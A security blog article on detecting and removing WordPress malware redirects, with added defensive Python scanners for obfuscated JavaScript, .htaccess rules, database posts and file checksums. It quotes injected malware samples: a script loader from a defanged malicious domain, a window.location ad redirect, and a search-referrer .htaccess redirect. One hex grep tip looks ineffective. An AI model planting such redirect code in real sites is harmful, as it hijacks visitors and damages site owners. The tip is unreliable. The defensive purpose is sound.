WordPress Malware Redirect: Detection and Fixes

WordPress makes it easy to tailor a website's content to one's needs, and its large-scale popularity is backed by strong community support. With a wide variety of plugins and add-ons to choose from, it has something for everyone. However, that same popularity means attacks on WordPress sites have become routine, and attackers constantly try to infect sites with attacks such as the WordPress malware redirect. The book WordPress 3 Ultimate Security gives a precise description of this predicament:

“Worse still is when spam leaves the remit of annoyance to enter the danger zone. It’s often injected into page content, so that sweet tutorial about baking cakes is suddenly laced with links to some scurrilous porn site or, more underhand still, your precious .htaccess site configuration file becomes littered with spam redirects to a rogue site that ruins your users’ as well as your reputation.”

WordPress Malware Redirect: Symptoms

Hackers target WordPress sites on a regular basis. There are certain commonly hacked WordPress files that attackers often target, but in the case of a WordPress hacked redirect the scenario is somewhat different: the attackers inject malicious code into your site. Often the admin is unaware of the attack and only learns of it once users complain. These are the typical behaviors of a "WordPress redirect hack".

Site visitors are redirected to spam websites or to sites related to scams or pornography. Hackers do this for their own purposes, such as increasing traffic to their website or intruding into users' private space; the latter is the more hazardous. Fortunately, preventive measures such as secure coding practices can be taken to avoid such attacks in the future.

WordPress Malware Redirect: Detection

A simple heuristic test is to visit your site from multiple devices. If the site or some page redirects you, it is most likely a malware redirection. From there, the files need to be inspected to determine the root cause.

JS Files

Usually, the core files are modified with JavaScript to create the redirections. Themes and plugins are the most vulnerable; in certain instances, entire rogue themes and plugins are uploaded. To automate infecting every .js file, attackers use an injecting script like the one shown below.

[Image: the WordPress malware redirect JavaScript injector script]

The script first lists all the files using PHP's 'scandir' function. It then walks the directory tree recursively using 'if/else' checks, and files with a .js extension are picked out via the '$file_name' variable. These files are then injected with JavaScript code that creates the redirects. The script also tries to determine the root path of each file, so that when several sites are hosted on a single server the infection spreads across all of them with a higher success rate. The infected files contain code that looks like this.

[Image: the hex-obfuscated code found in infected .js files]

This code is obfuscated using hex notation. In certain cases, base64 encoding may be used, depending on the malware variant. When decoded, it translates to something like:

<script src="hxxp://malicious.domain/jquery.js"></script>

This script is loaded from the domain found to be malicious, and it redirects users with the code:

window.location.href = "hxxp://go .ad2up[.]com/afu.php?id=473791";

This code then displays spam advertisements to the users. Therefore, it becomes important to detect which specific script initiates the WordPress malware redirect!
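A defender-side scanner for the injection described above, added here as an example and not code from the original post: it walks a directory tree, decodes hex-escaped and base64 (atob) string literals in .js files, and flags the ones that hide a <script> loader or a window.location redirect. The SUSPICIOUS markers, the sample file contents and the domains (hxxp://, .example) are constructed for this example and are not real indicators.

```python
"""Scan .js files for hex- or base64-obfuscated loader/redirect injections.

Illustrative code for this article, not a tool from the original post.
Samples below are constructed and defanged.
"""
from __future__ import annotations

import base64
import re
from pathlib import Path

# Decoded text that indicates a loader or redirect rather than legitimate code (assumed list).
SUSPICIOUS = ("<script", "window.location", "document.write", ".src=")

# A JS string literal made entirely of \xNN escapes, at least 4 bytes long.
HEX_STR = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')
# A base64 literal passed straight to atob(), the usual base64 variant.
B64_STR = re.compile(r'atob\(\s*"([A-Za-z0-9+/=]{16,})"\s*\)')


def decode_hex(escaped: str) -> str:
    """Turn "\\x3c\\x73..." into the text it encodes."""
    return bytes.fromhex(escaped.replace("\\x", "")).decode("latin-1")


def find_injections(js: str) -> list[dict]:
    """Return every obfuscated literal in js whose decoded form looks like an injection."""
    hits = []
    for m in HEX_STR.finditer(js):
        decoded = decode_hex(m.group(1))
        if any(t in decoded.lower() for t in SUSPICIOUS):
            hits.append({"encoding": "hex", "offset": m.start(), "decoded": decoded})
    for m in B64_STR.finditer(js):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text: skip
        if any(t in decoded.lower() for t in SUSPICIOUS):
            hits.append({"encoding": "base64", "offset": m.start(), "decoded": decoded})
    return hits


def scan_tree(root: str) -> dict[str, list[dict]]:
    """Recursively scan every .js file under root; map file path -> findings."""
    report = {}
    for path in Path(root).rglob("*.js"):
        hits = find_injections(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


def _hexify(text: str) -> str:
    """Helper used only to build the constructed samples below."""
    return "".join(f"\\x{ord(c):02x}" for c in text)


# Constructed samples: an injected file, a base64 variant, and a clean file.
INJECTED_SAMPLE = (
    'var d=document;d.write("'
    + _hexify('<script src="hxxp://malicious.example/jquery.js"></script>')
    + '");'
)
B64_SAMPLE = 'eval(atob("%s"));' % base64.b64encode(
    b'window.location.href="hxxp://ads.example/afu.php?id=0";'
).decode()
CLEAN_SAMPLE = 'jQuery(function($){ $(".menu").toggle(); });'

if __name__ == "__main__":
    for name, sample in (("hex", INJECTED_SAMPLE), ("base64", B64_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, find_injections(sample))
```

Run scan_tree("/path-of-www") on a copy of the site to get a per-file list of decoded payloads; reviewing the decoded text (rather than the raw escapes) is what tells you which script actually starts the redirect.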

PHP Files

Apart from .js files, PHP files are also commonly targeted by attackers. Some commonly infected files are:

  • Plugins
  • Themes
  • header.php
  • footer.php
  • .htaccess
  • functions.php

It is advisable to look into the .htaccess file, since this file is often used to detect user agents and create redirects. In cases of infection, the .htaccess contains code like:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* http://MaliciousDomain.tld/redirect.php?t=3 [R,L]

Here, the last line redirects every request whose referrer matches one of the preceding conditions (visitors arriving from search engines) to a redirect script called 'redirect.php' on the malicious domain. This script then diverts the users to WordPress malware redirect pages.

Do note, however, that .htaccess is a sensitive file: improper editing may break the site, so consult experts if you are not familiar with it. It is also advisable to look into the core files to detect infection. Certain common backdoors, such as the Filesman backdoor, can be detected using automatic scanners.
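An analyser for the .htaccess pattern above, added as an example and not code from the original post: it pairs each RewriteRule with the RewriteCond lines preceding it and reports the two traits of the malicious block, a redirect (R flag) to a host other than the site's own and conditions that only fire for visitors arriving from search engines. The SEARCH_ENGINES list and the own_host parameter are assumptions of this example; the infected sample is the article's block with its MaliciousDomain.tld placeholder, and the second sample is the stock WordPress rewrite block.

```python
"""Flag referrer-conditioned external redirects in .htaccess rewrite blocks.

Illustrative code for this article, not a tool from the original post.
"""
from __future__ import annotations

from urllib.parse import urlparse

# Referrer fragments that make a conditional redirect look like search-traffic cloaking (assumed).
SEARCH_ENGINES = ("google", "bing", "yahoo", "ask.com", "duckduckgo")


def parse_flags(raw: str) -> list[str]:
    """'[NC,OR]' -> ['NC', 'OR']; '' -> []."""
    return [f.strip() for f in raw.strip("[]").split(",") if f.strip()] if raw else []


def parse_rewrites(text: str) -> list[dict]:
    """Return the RewriteRules, each with the RewriteConds that precede it."""
    rules, pending = [], []
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] == "RewriteCond" and len(parts) >= 3:
            pending.append({"test": parts[1], "pattern": parts[2],
                            "flags": parse_flags(parts[3] if len(parts) > 3 else "")})
        elif parts[0] == "RewriteRule" and len(parts) >= 3:
            rules.append({"pattern": parts[1], "target": parts[2],
                          "flags": parse_flags(parts[3] if len(parts) > 3 else ""),
                          "conds": pending})
            pending = []  # RewriteConds apply only to the next RewriteRule
    return rules


def suspicious_reasons(rule: dict, own_host: str) -> list[str]:
    """Explain why a rule looks like a malware redirect; an empty list means nothing found."""
    reasons = []
    target = urlparse(rule["target"])
    external = target.scheme in ("http", "https") and target.hostname not in (None, own_host.lower())
    is_redirect = any(f == "R" or f.startswith("R=") for f in rule["flags"])
    if external and is_redirect:
        reasons.append(f"redirects to external host {target.hostname}")
    if external and rule["pattern"] in (".*", "^(.*)$", "(.*)"):
        reasons.append("catch-all pattern sends every request away")
    for cond in rule["conds"]:
        pat = cond["pattern"].lower()
        if cond["test"] == "%{HTTP_REFERER}" and any(se in pat for se in SEARCH_ENGINES):
            reasons.append(f"fires only for search-engine referrer {cond['pattern']}")
        if cond["test"] == "%{HTTP_USER_AGENT}" and "bot" in pat:
            reasons.append("user-agent condition hides the redirect from crawlers")
    return reasons


def audit_htaccess(text: str, own_host: str) -> list[tuple[str, list[str]]]:
    """(target, reasons) for every rule that has at least one reason."""
    out = []
    for rule in parse_rewrites(text):
        reasons = suspicious_reasons(rule, own_host)
        if reasons:
            out.append((rule["target"], reasons))
    return out


# Constructed samples: the injected block from the article, and WordPress's stock rules.
INFECTED = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* http://MaliciousDomain.tld/redirect.php?t=3 [R,L]
"""
STOCK_WORDPRESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

if __name__ == "__main__":
    print(audit_htaccess(INFECTED, "www.example.com"))
    print(audit_htaccess(STOCK_WORDPRESS, "www.example.com"))
```

The stock block produces no findings because its targets are local paths; a rule only appears in the report when a redirect leaves the site or is gated on the referrer or user agent, which is exactly the cloaking behaviour that makes these infections invisible to the site owner who types the address directly.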

Database Tools

At times the infection is not in the core files but in the posts or pages of the site. These can be challenging to detect, since the scripts may contain code identical to that found in the core files above. They can be found with a database admin tool like phpMyAdmin, which also allows the infected pages/posts to be edited.

[Image: phpMyAdmin search for the malicious script URL across the site's database]

Use the search function of phpMyAdmin to list all pages/posts that contain the malicious script

hxxp://maliciousSITE[.]com/bad.php

in their content. This makes it easy to detect the WordPress malware redirect within the posts. The same tool can also be used to check whether any new admin users have been created.
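The two database checks just described, written out as SQL and run here against an in-memory SQLite stand-in for the site's MySQL database; this is an added example, not code from the original post, and the same statements can be pasted into phpMyAdmin's SQL tab. The table layouts follow WordPress's wp_posts, wp_users and wp_usermeta (the wp_ prefix is the default; a site's own prefix is set in wp-config.php), the rows are constructed, and the script URL is the defanged placeholder from the article.

```python
"""Search wp_posts for an injected script and enumerate administrator accounts.

Illustrative code for this article, not from the original post; SQLite stands in for MySQL.
"""
import sqlite3

SCHEMA = """
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT,
                       post_content TEXT, post_modified TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                          meta_key TEXT, meta_value TEXT);
"""

# Constructed rows: one clean post, one post carrying the injected loader,
# two administrators (one registered recently) and a subscriber.
POSTS = [
    (1, "Baking a cake", "<p>Mix flour, sugar and eggs.</p>", "2019-03-02 10:00:00"),
    (2, "About us",
     '<p>Welcome.</p><script src="hxxp://maliciousSITE[.]com/bad.php"></script>',
     "2020-06-15 03:14:02"),
]
USERS = [
    (1, "jane", "2019-01-01 00:00:00"),
    (2, "reader_bob", "2019-05-20 12:00:00"),
    (3, "wp-support", "2020-06-15 03:12:44"),
]
# WordPress stores roles as a PHP-serialised array under the wp_capabilities meta key.
USERMETA = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]


def build_db() -> sqlite3.Connection:
    """Create the stand-in database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?)", POSTS)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?)", USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", USERMETA)
    return conn


def find_infected_posts(conn: sqlite3.Connection, marker: str) -> list[tuple]:
    """Posts/pages whose content contains the marker string (the phpMyAdmin search, as SQL)."""
    sql = ("SELECT ID, post_title, post_modified FROM wp_posts "
           "WHERE post_content LIKE ? ORDER BY ID")
    return conn.execute(sql, (f"%{marker}%",)).fetchall()


def list_administrators(conn: sqlite3.Connection) -> list[tuple]:
    """Every account holding the administrator role, newest registration first."""
    sql = """
        SELECT u.ID, u.user_login, u.user_registered
        FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'
        ORDER BY u.user_registered DESC
    """
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(find_infected_posts(db, "maliciousSITE[.]com/bad.php"))
    print(list_administrators(db))
```

Ordering administrators by registration date puts any account created during the incident at the top, which is the quickest way to spot an admin you did not add; the post query's post_modified column likewise tells you when the content was tampered with, which is useful for the timeline.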

Third-Party Advertisements

WordPress malware redirects can also happen when the site itself is completely secure. Site admins sometimes make provision for third-party ads to generate revenue, and some ad networks do not have a stringent policy on ad content. As a result, those ads may contain code that redirects users as soon as they visit the site.

These redirects are not easy to detect since the code is hosted on the ad network's servers. Treat this as the last resort, after all the detection methods given above have failed: stop hosting the ads, and if the redirects stop, the infection was due to third-party ads. Contact the ad network regarding this and get the issue resolved!

WordPress Malware Redirect Hack: Cleanup

Clean and Restore Core Files

First, check for any modified files. This can be done in two ways. One is to download a fresh copy of WordPress and compare checksums, which can be time-consuming. The other is to log in via SSH and list files by modification time with the following command:

find /path-of-www -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r

This command lists all files sorted by modification timestamp, newest first. Check those files for malicious code and remove any you find. In sensitive files like .htaccess, if you are unsure what a line does, comment it out using the '#' character. Then restore the files from a backup; if no backup is available, use a fresh copy.
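The checksum comparison mentioned above, written out as an added example (not code from the original post): it hashes every file under the live site and under a fresh copy of the same WordPress version, then reports files that differ, exist only in the live tree, or are missing. The EXPECTED_LOCAL list (wp-config.php and uploads, which legitimately differ from a fresh download) is an assumption of this example, and demo() builds two small constructed trees in a temporary directory; on a real site, point checksum_tree at the web root and at the unpacked download.

```python
"""Compare a live WordPress tree against a fresh copy by SHA-256 checksum.

Illustrative code for this article, not a tool from the original post.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

# Paths that legitimately differ from a fresh copy; reported separately (assumed list).
EXPECTED_LOCAL = ("wp-config.php", "wp-content/uploads/")


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large media files need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def checksum_tree(root: str | Path) -> dict[str, str]:
    """relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_trees(live: dict[str, str], clean: dict[str, str]) -> dict[str, list[str]]:
    """Classify paths as modified, added (live only), missing (clean only) or expected-local."""
    def expected(p: str) -> bool:
        return any(p == e or p.startswith(e) for e in EXPECTED_LOCAL)

    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "added": sorted(p for p in live if p not in clean and not expected(p)),
        "missing": sorted(p for p in clean if p not in live),
        "expected_local": sorted(p for p in live if p not in clean and expected(p)),
    }


def demo() -> dict[str, list[str]]:
    """Build two constructed trees, tamper with one, and return the comparison."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        files = {
            "wp-includes/js/jquery/jquery.js": "/* jquery */",
            "wp-content/themes/t/footer.php": "<?php wp_footer(); ?>",
            "index.php": "<?php require 'wp-blog-header.php';",
        }
        for rel, body in files.items():
            for root in (clean, live):
                (root / rel).parent.mkdir(parents=True, exist_ok=True)
                (root / rel).write_text(body)
        # Tamper with the live tree the way the article describes (constructed).
        (live / "wp-includes/js/jquery/jquery.js").write_text('/* jquery */ document.write("\\x3c...");')
        (live / "wp-content/themes/t/injected.php").write_text("<?php /* constructed rogue file */ ?>")
        (live / "wp-config.php").write_text("<?php /* site-specific, expected to differ */ ?>")
        (live / "wp-content/uploads").mkdir(parents=True)
        (live / "wp-content/uploads/photo.jpg").write_bytes(b"\xff\xd8")
        return compare_trees(checksum_tree(live), checksum_tree(clean))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Unlike the timestamp listing, a checksum diff also catches files whose modification time was reset by the attacker, and the "added" bucket is where rogue PHP files dropped into theme or plugin directories show up; everything under uploads still deserves a look for .php files, which do not belong there.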

Find and Remove Obfuscated Code

Some malicious code can evade detection because attackers use obfuscation techniques like FOPO to hide it. To find base64-encoded code, use grep like this:

find . -name "*.php" -exec grep "base64" '{}' \; -print &> output.txt

This saves the matching lines and the names of every file containing the string base64 to output.txt, from which you can proceed to clean those files. If the encoding is in hex format, use the command

grep -Pr "[\x01\x02\x03]"

Remove Rogue Users

Visit your Dashboard and check whether any unfamiliar users have appeared. Delete all rogue users and combine that with a secure password (change the existing one if it does not meet the required standards). Keep separate passwords for FTP, the Dashboard, and so on. Ensure that there are no default or hard-coded passwords, and change all of them to secure random passwords.

Use a Security Solution

Even after following the above steps, the WordPress malware redirect hack may persist. To detect the last traces of the infection, use an automatic solution. As issues arise, so do the solutions available in the market, so there is no shortage of options. However, parameters like cost-effectiveness and detection rate should be considered, especially by small businesses or startups, to keep the site secure.

WordPress Malware Redirect Hack: Prevention

Update

Enough can never be said about keeping your installation up to date; it is perhaps the most economical way to stay secure. Updates contain security patches, which can be seen in the changelog. Apart from the core installation, keep plugins and themes updated, and avoid nulled or disreputable themes as they may contain buggy code. Use reputable plugins and keep them updated!

Firewall

If your site is targeted regularly, it is advisable to use a firewall. A firewall helps keep the site safe by inspecting all incoming traffic for suspicious activity, so bad requests like SQL injection, XSS, LFI, RFI, etc. are blocked. Finding a good firewall solution can be tedious, especially for beginners; one easy-to-use and economical solution is available at Astra Security, with great customer feedback.

[Image: WordPress malware redirect protection: how Astra Firewall protects its customers]

Security Audit

Nothing could be better than discovering the loopholes in your site before the attackers do, and a comprehensive security audit reveals them. The audit scans for and finds the vulnerable parameters of the site, whether a business-logic flaw or a CSRF vulnerability. The security audit and pentesting take care of it all.

Those well-versed in security matters are rare, even more so when issues pop up left and right every other day. Therefore, finding the right people for the job is an equally important task as they can handle your security worries for you, and do so in the right manner. 


Anurag
